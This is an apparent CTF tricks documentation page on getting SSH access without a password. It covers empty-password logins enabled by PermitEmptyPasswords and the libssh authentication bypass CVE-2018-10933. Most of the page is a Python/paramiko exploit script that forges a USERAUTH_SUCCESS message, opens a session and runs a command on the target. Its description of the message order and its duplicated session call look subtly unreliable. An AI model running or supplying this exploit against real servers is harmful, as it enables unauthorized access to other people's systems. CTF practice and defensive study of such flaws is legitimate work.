> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/ssh/trick-0446.md).

# SSH Login with No Password

***

If you discover a user account on a target system configured for SSH authentication without requiring a password, you can attempt to log in directly using the standard `ssh` command:

```bash
ssh username@target_ip_or_hostname
```

For example, if a user like `iamacrazyfreeuser` on `target2.ine.local` is identified as having no password configured for SSH access:

```bash
ssh iamacrazyfreeuser@target2.ine.local
```

This method exploits a system misconfiguration or specific user setup where a password isn't necessary for successful SSH authentication. For users with no password configured, logging in via SSH password authentication is typically prevented by default. However, if the SSH server configuration includes `PermitEmptyPasswords yes`, it may allow such logins. The standard `ssh` command is used to attempt connection, and if the server allows empty passwords for the user, it will proceed without prompting.

Another scenario allowing authentication bypass without a password is the `libssh-auth-bypass-cve-2018-10933` vulnerability. This vulnerability allows bypassing the need for a password or key by sending the `SSH2_MSG_USERAUTH_SUCCESS` message early in the authentication process. Instead of providing credentials, an attacker could send the `SSH2_MSG_USERAUTH_SUCCESS` message immediately after the `SSH2_MSG_USERAUTH_REQUEST` message. This can be exploited using a custom client script. An example script leveraging this vulnerability is shown below:

```python
import paramiko
import socket
import sys

hostname = 'target_ip_or_hostname'
port = 22
username = 'any_user' # Username doesn't matter for this bypass

sock = socket.create_connection((hostname, port))
transport = paramiko.Transport(sock)
transport.start_client()

# Bypass: Send USERAUTH_REQUEST followed immediately by USERAUTH_SUCCESS
message = paramiko.message.Message()
message.add_byte(paramiko.common.cMSG_USERAUTH_REQUEST)
message.add_string(username)
message.add_string('ssh-connection')
message.add_string('none') # 'none' method is often tried first

transport._send_message(message)

# Send SSH2_MSG_USERAUTH_SUCCESS (message code 52)
success_message = paramiko.message.Message()
success_message.add_byte(52) # SSH2_MSG_USERAUTH_SUCCESS
transport._send_message(success_message)

# Check response
try:
    transport.open_session()
    print(f"Bypass successful! Authenticated as {username}")
    # You can now interact with the session
    session = transport.open_session()
    session.exec_command('id') # Example command
    stdout = session.makefile('rb', 2048)
    stderr = session.makefile('rb', 2048)
    print(stdout.read().decode())
    print(stderr.read().decode())
    session.close()
except paramiko.SSHException as e:
    print(f"Bypass failed: {e}")

transport.close()
```
